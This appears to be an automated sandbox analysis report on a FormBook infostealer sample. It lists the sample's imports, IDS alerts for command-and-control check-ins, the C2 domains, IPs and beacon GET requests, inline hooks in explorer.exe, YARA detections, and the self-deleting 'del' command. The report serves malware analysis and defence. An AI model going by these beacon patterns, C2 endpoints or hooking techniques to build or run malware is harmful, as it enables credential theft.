                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    01/14/22-03:39:09.329226TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.329226TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.329226TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.373367TCP1201ATTACK-RESPONSES 403 Forbidden804981923.227.38.74192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 03:38:27.771661997 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:27.889265060 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:27.889566898 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:27.889576912 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.008744001 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.376822948 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.461199999 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.461220026 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.461890936 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.461905003 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.495172024 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.495368004 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:48.657919884 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.675013065 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.677712917 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.677973032 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.694858074 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.705641031 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.706160069 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.706252098 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.706278086 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.723239899 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:39:09.311626911 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.328722000 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.328953028 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.329226017 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.346127987 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373367071 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373408079 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373435974 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373460054 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373477936 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373492002 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373507023 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373677969 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.373833895 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.373939037 CET4981980192.168.2.323.227.38.74

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 03:38:27.518068075 CET5265053192.168.2.38.8.8.8
                    Jan 14, 2022 03:38:27.765955925 CET53526508.8.8.8192.168.2.3
                    Jan 14, 2022 03:38:48.632225037 CET6329753192.168.2.38.8.8.8
                    Jan 14, 2022 03:38:48.656395912 CET53632978.8.8.8192.168.2.3
                    Jan 14, 2022 03:39:09.281239986 CET5361553192.168.2.38.8.8.8
                    Jan 14, 2022 03:39:09.309283972 CET53536158.8.8.8192.168.2.3
                    Jan 14, 2022 03:39:29.496071100 CET5072853192.168.2.38.8.8.8
                    Jan 14, 2022 03:39:29.602072954 CET53507288.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2022 03:38:27.518068075 CET192.168.2.38.8.8.80x7cddStandard query (0)www.nanasyhogar.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.632225037 CET192.168.2.38.8.8.80x7e08Standard query (0)www.alibabasdeli.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:09.281239986 CET192.168.2.38.8.8.80xd5acStandard query (0)www.gigasupplies.comA (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:29.496071100 CET192.168.2.38.8.8.80x1d40Standard query (0)www.mnbvending.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2022 03:38:27.765955925 CET8.8.8.8192.168.2.30x7cddNo error (0)www.nanasyhogar.comnanasyhogar.comCNAME (Canonical name)IN (0x0001)
                    Jan 14, 2022 03:38:27.765955925 CET8.8.8.8192.168.2.30x7cddNo error (0)nanasyhogar.com50.31.177.38A (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET8.8.8.8192.168.2.30x7e08No error (0)www.alibabasdeli.com172.67.173.57A (IP address)IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET8.8.8.8192.168.2.30x7e08No error (0)www.alibabasdeli.com104.21.30.160A (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET8.8.8.8192.168.2.30xd5acNo error (0)www.gigasupplies.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET8.8.8.8192.168.2.30xd5acNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                    Jan 14, 2022 03:39:29.602072954 CET8.8.8.8192.168.2.30x1d40No error (0)www.mnbvending.com199.59.243.200A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.nanasyhogar.com
                    • www.alibabasdeli.com
                    • www.gigasupplies.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.34979350.31.177.3880C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:38:27.889576912 CET10300OUTGET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1
                    Host: www.nanasyhogar.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:28.461199999 CET10301INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html; charset=UTF-8
                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                    cache-control: no-cache, must-revalidate, max-age=0
                    x-redirect-by: WordPress
                    location: https://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf
                    content-length: 0
                    date: Fri, 14 Jan 2022 02:38:27 GMT


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.349808172.67.173.5780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:38:48.677973032 CET12054OUTGET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1
                    Host: www.alibabasdeli.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:48.705641031 CET12055INHTTP/1.1 301 Moved Permanently
                    Date: Fri, 14 Jan 2022 02:38:48 GMT
                    Transfer-Encoding: chunked
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Fri, 14 Jan 2022 03:38:48 GMT
                    Location: https://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IgjFfWdmsLKF6nMy5eaecanBpYGYtijY%2F9ML7bYbo0jwULbFmirtMXIUFdaeYKaZw0SjcZLe8AgxrbUYROuDN%2FNsw420lPpE5m2qvu%2BdTZvcH%2BD2gpXk494OMVi7AvX9wFxVMZB9xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6cd37d8248424df4-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.34981923.227.38.7480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 03:39:09.329226017 CET12088OUTGET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1
                    Host: www.gigasupplies.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:39:09.373367071 CET12089INHTTP/1.1 403 Forbidden
                    Date: Fri, 14 Jan 2022 02:39:09 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    X-Sorting-Hat-PodId: 188
                    X-Sorting-Hat-ShopId: 60258091197
                    X-Dc: gcp-europe-west1
                    X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce
                    X-Permitted-Cross-Domain-Policies: none
                    X-XSS-Protection: 1; mode=block
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 6cd37e035a694e0e-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                    Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: nji3Lg1ot6.exe PID: 5092 Parent PID: 3160

                    General

                    Start time:03:37:19
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Analysis Process: nji3Lg1ot6.exe PID: 6920 Parent PID: 5092

                    General

                    Start time:03:37:20
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Analysis Process: explorer.exe PID: 3352 Parent PID: 6920

                    General

                    Start time:03:37:23
                    Start date:14/01/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Analysis Process: autochk.exe PID: 6480 Parent PID: 3352

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\autochk.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\SysWOW64\autochk.exe
                    Imagebase:0xdc0000
                    File size:871424 bytes
                    MD5 hash:34236DB574405291498BCD13D20C42EB
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Analysis Process: msiexec.exe PID: 1304 Parent PID: 3352

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                    Imagebase:0x890000
                    File size:59904 bytes
                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Analysis Process: cmd.exe PID: 7156 Parent PID: 1304

                    General

                    Start time:03:37:46
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Analysis Process: conhost.exe PID: 5352 Parent PID: 7156

                    General

                    Start time:03:37:47
                    Start date:14/01/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >